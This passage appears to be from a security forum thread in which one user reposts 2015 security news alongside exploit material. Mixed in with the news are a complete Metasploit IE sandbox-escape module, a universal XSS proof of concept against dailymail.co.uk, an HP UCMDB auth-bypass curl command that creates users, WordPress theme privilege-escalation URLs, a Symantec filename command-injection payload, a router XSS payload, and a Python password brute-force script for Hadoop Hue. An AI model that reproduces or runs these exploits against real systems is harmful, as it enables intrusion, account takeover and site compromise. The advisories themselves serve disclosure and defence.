Cameron who don’t like encryption said nobody could use it," he added. Rather than being fearful of encryption the government should be encouraging enterprises to adopt it in order to safeguard privacy in cases where corporate system are breached. Zimmermann hopes that more enterprises will take lessons from the Sony Pictures megahack and use it as a spur to kick ahead with encryption projects, an idea he explores in greater depth in a post on Silent Circle's blog. Source
  8. Aerosol
    ADOBE FLASH IS VULNERABLE again, Adobe has warned. The company released a new security bulletin acknowledging a zero-day flaw in Flash Player which was exploited throughout January. Classified with a 'critical' severity rating, the CVE-2015-0313 flaw affects Flash Player 16.0.0.296 and earlier versions on Windows and OS X machines. A successful exploitation "could cause a crash and potentially allow an attacker to take control of the affected system", Adobe warned. The company thanked security researchers from Microsoft and Trend Micro for reporting the flaw. The vulnerability is being exploited via drive-by download attacks against users of Internet Explorer and Firefox on Windows 8.1, Adobe said. Trend Micro said that the flaw has been exploited by cyber criminals with 'malvertising' campaigns that redirect visitors from a legitimate site to a malicious domain where the exploit is hosted. Using the ad-serving network allows the criminals to maximise the attack surface while spreading the infection automatically on vulnerable systems, the security firm explained. Most of those who accessed the malicious server in January were located in the US, Trend Micro said. The popular video sharing site Dailymotion was one site affected by the vulnerability. January was a busy period for Flash Player, with two critical flaws already discovered and patched by Adobe near the end of the month. The company said that a fixed version of Flash Player will be released this week. Andy Manoske of security company AlienVault said that Flash "is extremely prolific with something like ~20% penetration of all active websites on the web", and that there is "an incredible amount of scrutiny on Flash" from researchers and criminals. The software's complicated architecture isn't helpful in avoiding the discovery of new vulnerabilities, the researcher warned. Source
  9. Aerosol
    If someone shares a porn video on Facebook, beware. The latest threat to users involves a fake Flash Player update which pops up during a preview of a pornographic video. Once you click on the link to update your video player, malware (the name given to malicious software), downloads onto your computer. This Trojan horse software gives the creator of the malware remote access to your computer. They can then download viruses onto your computer. Security researcher Mohammad Faghani alerted users to the threat in a post on the Full Disclosure blog, which flags up network vulnerabilities. "The Trojan tags the infected user's friends with an enticing post," he explained. Faghani warned that the malware then tags up to 20 friends of the victim in the malicious post, thus leading to a larger number of those who could be affected. He believes it could "infect more than 110,000 users in two days". Faghani also said the malware was able to hijack keyboard and mouse movement. In response, Facebook said it was aware of the problem and was working to block it. In a statement issued to security news website Threatpost, a Facebook spokesperson said: "We use a number of automated systems to identify potentially harmful links and stop them from spreading. "In this case, we're aware of these malware varieties, which are typically hosted as browser extensions and distributed using links on social media sites. "We are blocking links to these scams, offering cleanup options, and pursuing additional measures to ensure that people continue to have a safe experience on Facebook." Last week, a hacker group called Lizard Squad had hinted it was responsible for the Facebook, Instagram and Tinder going down. Facebook denied it was hacked, saying the access issues were "not the result of a third party attack". Source
  10. Aerosol
    Update: Capstone 3.0.1 Changes: Release 3.0.1 is a stable version with important fixes in the core & Python bindings. Download
  11. Aerosol
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in Internet Explorer's sandbox, specifically the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape the Protected Mode, and execute code with Medium Integrity. At the moment, this module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # From Threat Intel of Symantec 'Henry Li', # Public vulnerability analysis 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'Arch' => [ARCH_X86], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 30 }, 'Targets' => [ [ 'Protected Mode (Windows 7) / 32 bits', { 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-0016'], ['MSB', 'MS15-004'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/'] ], 'DisclosureDate' => 'Jan 13 2015' })) end def check temp = get_env('WINDIR') dll_path = "#{temp}\\System32\\TSWbPrxy.exe" win_ver = sysinfo['OS'] unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/ return Exploit::CheckCode::Safe end unless file_exist?(dll_path) return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def exploit print_status('Checking target...') unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'System not vulnerable') end if session.platform !~ /^x86\// fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment') end win_ver = sysinfo['OS'] if win_ver =~ /Windows 2012|Windows 8/ fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment') end print_status('Checking the Process Integrity Level...') unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, 'Not running at Low Integrity') end cmd = cmd_psh_payload( payload.encoded, payload_instance.arch.first, { :remove_comspec => true } ) print_status('Storing payload on environment variable...') cmd.gsub!('powershell.exe ','') session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd) print_status('Exploiting...') temp = get_env('TEMP') # Using the old meterpreter loader, if it's loaded with # Reflective DLL Injection the exceptions in the sandbox # policy won't apply. session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'), 'TargetFilePath' => temp + '\\cve-2015-0016.dll', 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil) super end end Source
  12. Aerosol
    <title>insider3show</title> <body style="font-family:Georgia;"> <h1>insider3show</h1> <iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script> <b>Summary</b><br> An Internet Explorer vulnerability is shown here:<br> Content of dailymail.co.uk can be changed by external domain.<br> <br> <b>How To Use</b><br> 1. Close the popup window("confirm" dialog) after three seconds.<br> 2. Click "Go".<br> 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.<br> <br> <b>Screenshot</b><br> <a href="screenshot.png">screenshot.png</a><br> <br> <b>Technical Details</b><br> Vulnerability: Universal Cross Site Scripting(XSS)<br> Impact: Same Origin Policy(SOP) is completely bypassed<br> Attack: Attackers can steal anything from another domain, and inject anything into another domain<br> Tested: Jan/29/2015 Internet Explorer 11 Windows 7<br> <br> <h1><a href="http://www.deusen.co.uk/">www.deusen.co.uk</a></h1><script type="text/javascript"> //<![CDATA[ try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"6e87366c9054a61c3c7f1d71c9cfb464",petok:"0fad4629f14e9e2e51da3427556c8e191894b109-1422897396-1800",zone:"deusen.co.uk",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"9e0d475915b2fa34aea396c09e17a7eb"}});!function(a,{a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=919620257c/cloudflare.min.js",b.parentNode.insertBefore(a,}()}}catch(e){}; //]]> </script> Source
  13. Aerosol
    Mogwai Security Advisory MSA-2015-02 ---------------------------------------------------------------------- Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass CVE-ID: CVE-2014-7883 Product: Hewlett-Packard Universal CMDB (UCMDB) Affected versions: UCMDB 10.10 (Other versions might also be affected) Impact: high Remote: yes Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html Reported: 14/11/2014 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The HP Universal CMDB (UCMDB) automatically collects and manages accurate and current business service definitions, associated infrastructure relationships and detailed information on the assets, and is a central component in many of the key processes in your IT organization, such as change management, asset management, service management, and business service management. The UCMDB ensures that these processes can rely on comprehensive and true data for all business services. Together with HP UCMDB Configuration Manager (UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear policies, and defined authorization process. Many IT organizations turn to a CMDB and configuration management processes to create a shared single version of truth to support business service management, IT service management, change management, and asset management initiatives. These initiatives help align IT efforts with business requirements and run IT operations more efficiently and effectively. The initiatives success depends on the CMDB providing a complete view into the configuration items (CIs) and assets as well as how various IT elements relate together to deliver the business service. ----------------------------------------------------------------------- Business recommendation: ----------------------------------------------------------------------- Apply configuration changes from HP https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169 -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 6.4 Impact Subscore: 4.9 Exploitability Subscore: 10 CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- UCMB administrators heavily rely on a JMX-Console, which is installed by default. The JMX-Console web application in UCMDB performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method (for example HEAD). The web.xml file of the JMX Console contains following security constrains: <security-constraint> <web-resource-collection> <web-resource-name>Protected Pages</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>sysadmin</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Callhome Servlet</web-resource-name> <url-pattern>/callhome</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> </security-constraint> This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console Authentication bypass). This can be used to create a new account which can then be used to access the JMX console. Proof of concept: ---------------------------------------------------------------------- The following Curl command will send a HEAD request to create a new user "pocuser" in the UCMDB Backend: curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser" Disclosure timeline: ---------------------------------------------------------------------- 14/11/2014: Reporting issue to HP 18/11/2014: Re-Reporting, as no acknowledge received 18/11/2014: Acknowledge from HP 02/01/2015: Requesting status update from HP 29/01/2015: Requesting status update from HP 31/01/2015: Response from HP, they plan to release the advisory next week 02/05/2015: HP releases security bulletin 03/05/2015: Mogwai security bulletin release Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab References: ---------------------------------------------------------------------- Official HP security bulletin https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906 ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
  14. Aerosol
    ------------------------------------------------------------------------------ WordPress Quasar Theme Previlege Escalation ------------------------------------------------------------------------------ [-] Theme Link: http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock [-] Affected Version: Version 1.9.1 [-] Vulnerability Description: The vulnerable code is located in the /rock-builder/rock-builder-ui.php script: function rock_builder_save_template(){ $data = $_REQUEST['data']; $template = $_REQUEST['template']; $templateName = $template['name']; $templateDBName = $template['database_name']; update_option($templateDBName, $data); $builderReferences = get_option("rock_builder_references",array()); $i = 0; foreach($builderReferences as $ref){ if($ref['database_name'] == $templateDBName){ $builderReferences[$i]['name'] = $templateName; update_option("rock_builder_references",$builderReferences); //echo "FOUND"; break; } $i++; } exit; } add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template"); then function rock_builder_save_template can be called by logged in users and executed which can lead to modifying wordpress settings and adding a new administrator which may cause the site a full take over [-] Proof of Concept: Accessing The Url below with a logged in user will set the default role of any new registered user as administrator(if you already had a user) http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template[database_name]=default_role Accessing The Url below with a logged in user will allow user registration if it was disabled this can be exploited by sending it to a logged in user or administrater (CSRF) http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template[database_name]=users_can_register Source
  15. Aerosol
    E destul de veche dar se mai practica. Totusi cum poti avea incredere intr-un tip ce iti spune: ,,Boss/Manca-ti-as vrei ceva iaftin?" Iti dai seama ca nimeni nu vine la tine sa te ajute.
  16. Aerosol
    @euintreb daca ii vei injura pe cei de la romtelecom( noul Telekom ) nu vei rezolva ninic poate doar te vor ,,arde" si mai mult cel mai bine e sa ii suni inca o data si sa fi calm.
  17. Aerosol
    http://m.youtube.com/?#/watch?v=Y7DmMIGu1HE
  18. Aerosol
    Description Heap - based buffer overflow in the __nss_hostname_digits_dots functi on in glibc 2.2, and other 2.x versions before 2.18, allows context - dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST. " The GHOST vulnerability is a serious weakness in th e Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE - 2015 - 0235 has been a ssigned to this issue. Qualys security researchers discovered this bug and worked closely with Linux distribution vendors. And as a result of that we are releasing this advisory today as a coordinated effort, and patches for all distribution are available January 27, 2015. Read more: http://dl.packetstormsecurity.net/papers/general/securing-ghost.pdf
  19. Aerosol
    A privacy hole in WhatsApp allowed anyone to view someone else's profile photo – even if a user had configured the mobile messenger app to only show their pic to their contacts. The privacy slip-up, which came with the debut of WhatsApp’s newly-introduced web interface at web.whatsapp.com, was discovered by 17-year-old security researcher Indrajeet Bhuyan. The service was designed to allow users to chat with WhatsApp contacts through a browser, potentially on a PC or laptop. Privacy settings applied on the mobile app were apparently not carried over onto the browser-based version of the technology, launched just days ago and only available through Google's Chrome browser. On the smartphone side, you can only use the functionality on Android, BlackBerry and Windows Mobile since there's no iOS version at this nascent stage. There's no suggestion that messages themselves were exposed. Only profile pictures were viewable to world+dog. A second issue, also discovered by the enterprisingly precocious Bhuyan, means that deleted photos are still viewable through the web client even though they appeared as blurred if deleted when accessed though mobile versions of the software. In both case you'd need to be logged in to see pictures in the trash, blurred or otherwise. This issue apparently stems from glitches in syncing functionality. It's unclear if and when the web version of WhatsApp will be updated to iron out these security glitches. WhatsApp recently introduced end-to-end encryption to better secure users’ messages, much to the chagrin of UK politicians such as David Cameron. Bhuyan, who had previously discovered a way to crash WhatsApp on users’ phones simply by sending a specially crafted message, has put together videos illustrating the ?WhatsApp web photo privacy bug? (here) and photo synch bug (here). Security veteran Graham Cluley said even though no sensitive data had actually been exposed, the teenager was right to call WhatsApp out on the latest issues he's managed to uncover. "Sure, it’s not the most serious privacy breach that has ever occurred, but that’s missing the point," Cluley explained in a blog post. "The fact of the matter is that WhatsApp users chose to keep their profile photos private, and their expectation is that WhatsApp will honour their choices and only allow their photos to be viewable by those who the user has approved." Source
  20. Aerosol
    Topface, one of the world's largest dating websites, said it has paid a hacker an undisclosed sum to stop trying to sell about 20 million email addresses stolen from the Russian company. Topface Chief Executive Dmitry Filatov said the company located the hacker, who had published ads to sell the data but had not actually sold them. "We have paid him an award for finding a vulnerability and agreed on further cooperation in the field of data security," Filatov said in an email on Friday, declining to disclose the size of the reward. Topface says it has some 92 million users and 1.6 million daily visitors. Cybersecurity experts typically advise companies not to pay hackers to return stolen data, calling that a ransom and saying cybercriminals often break promises. But Filatov noted that the ads have already been removed and Topface has agreed not to pursue charges against the unidentified individual. "As we made an agreement with him we do not see any reason for him to break it," said Filatov. Atlanta-based fraud protection firm Easy Solutions disclosed the hack on Sunday, reporting on its blog that a hacker known as "Mastermind" was attempting to sell 20 million credentials from an unnamed dating site. Only email address had been stolen, Filatov said. "There was no access to other information - neither passwords, nor content of the accounts." Source
  21. Aerosol
    After being disrupted by law enforcement in December 2013, the peer-to-peer (P2P) ZeroAccess botnet – also known as Sirefef – has resumed advertising click fraud activities, according to the Dell SecureWorks Counter Threat Unit (CTU). The team first noticed the botnet reactivating from March 21, 2014, to July 2, 2014, and then on Jan. 15 it started to distribute click-fraud templates to compromised systems, a Wednesday post indicates, noting that the botnet is made up of hosts from previous compromises and there have been no observed attempts to expand the botnet. Currently, the ZeroAccess botnet's infection base is around 55,000 systems, which is considerably lower than the reported two million systems that were infected when the botnet was taken down at the end of 2013, Jeff Williams, director of security strategy with the Dell SecureWorks CTU, told SCMagazine.com on Friday. “The current campaign may be small by design [perhaps in order to] evade detection, and it may be largely outside of the United States and Europe as a method to avoid those law enforcement agencies which were involved in the takedown operation (FBI in the U.S. and EC3 in Europe),” Williams said. According to a geographic distribution of ZeroAccess botnet peers included in the post, Japan has 15,322 hosts, or 27.7 percent of total infections. India is the runner-up with 7,446 hosts, or 13.5 percent of total infections, and the U.S. came in fifth with 2,540 hosts, or 4.6 percent of total infections. “There are a variety of ways that a criminal will infect systems with malware,” Williams said. “A common method right now is through the use of an exploit kit, embedded in a hidden frame on a webpage. In some cases, these malicious frames are part of a malicious advertising campaign and delivered through the same advertising networks which they are intending to defraud.” Threat actors typically benefit from click fraud through the cost per click model of online advertising, Williams said. He explained that “the miscreant will leverage software – often in the form of a bot – to click through advertisements repeatedly in order to either generate revenue in a [cost per click] model or to exhaust the advertising budget of a rival.” Click fraud often involves the use of a botnet so that clicks on advertisements are not seen coming from the same computer, Williams said. He explained that clicking from the same computer would trigger anti-fraud measures and that the clicks would be removed from the payout calculations, whereas using a botnet helps fraudsters remain undetected. “The losers in a click fraud scenario from a monetary perspective are the advertisers,” Williams said. “They have invested money to have their advertisements viewed by people who may be interested in their product or service. They pay a finite amount which, when the [cost per click or cost per mille] limit is reached for that campaign, their ads are no longer displayed.” Source
  22. Aerosol
    Vantage Point Security Advisory 2014-007 ======================================== Title: Symantec Encryption Management Server - Remote Command Injection ID: VP-2014-007 Vendor: Symantec Affected Product: Symantec Encryption Gateway Affected Versions: < 3.2.0 MP6 Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ Author: Paul Craig <paul[at]vantagepoint[dot]sg Summary: --------- Symantec Gateway Email Encryption provides centrally managed email encryption to secure email communications with customers and partners regardless of whether or not recipients have their own email encryption software. With Gateway Email Encryption, organizations can minimize the risk of a data breach while complying with regulatory mandates for information security and privacy. Details: --------- Remote Command Injection vulnerabilities occur when user supplied input is used directly as a command line argument to a fork(), execv() or a CreateProcessA() function. It was found that the binary /usr/bin/pgpsysconf calls the binary /usr/bin/pgpbackup with unfiltered user supplied input when restoring a Database Backup from the Symantec Encryption Management Web Interface . The user supplied 'filename' value is used directly as a command argument, and can be concatenated to include additional commands with the use of the pipe character. This can allow a lower privileged Administrator to compromise the Encryption Management Server. This is demonstrated below in a snippet from pgpsysconf; .text:08058FEA mov dword ptr [ebx], offset aUsrBinPgpbacku ; "/usr/bin/pgpbackup" .text:08058FF0 cmp [ebp+var_1D], 0 .text:08058FF4 jnz short loc_8059049 .text:08058FF6 mov ecx, 4 .text:08058FFB mov edx, 8 .text:08059000 mov eax, 0Ch .text:08059005 mov dword ptr [ebx+ecx], offset unk_807AE50 .text:0805900C mov [ebx+edx], esi .text:0805900F mov dword ptr [ebx+eax], 0 .text:08059016 call _fork ; Bingo.. An example to exploit this vulnerability and run the ping command can be seen below. POST /omc/uploadBackup.event .... .... Content-Disposition: form-data; name="file"; filename="test123|`ping`|-whatever.tar.gz.pgp" This vulnerability can be further exploited to gain local root access by calling the setuid binary pgpsysconf to install a local package file. Fix Information: --------- Upgrade to Symantec Encryption Management Server 3.3.2 MP7. See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00 for more information Timeline: --------- 2014/11/26: Issue Reported. 2015/01/30: Patch Released. About Vantage Point Security: --------- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg Source
  23. Aerosol
    ##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Requierd # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnarable for crosss site scripting attack,this may cause a huge network compemise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up router Enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+App ly+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. this will ask for creadintial once creatintial enterd it will be successfull XSS # Disclosure: 8-jan-2015 Repoerted to ASUS 9-jan-2015 Asus confirm that they reported to concern department 15-jan-2015 Ask for update from asus asus says reported to HQ 28-jan-2015 Ask asus about reporting security foucus No reply from ASUS 29-jan-2015 security focus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source
  24. Aerosol
    felicitari, apropo faci colectie de tricouri!
  25. Aerosol
    Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
×
×
  • Create New...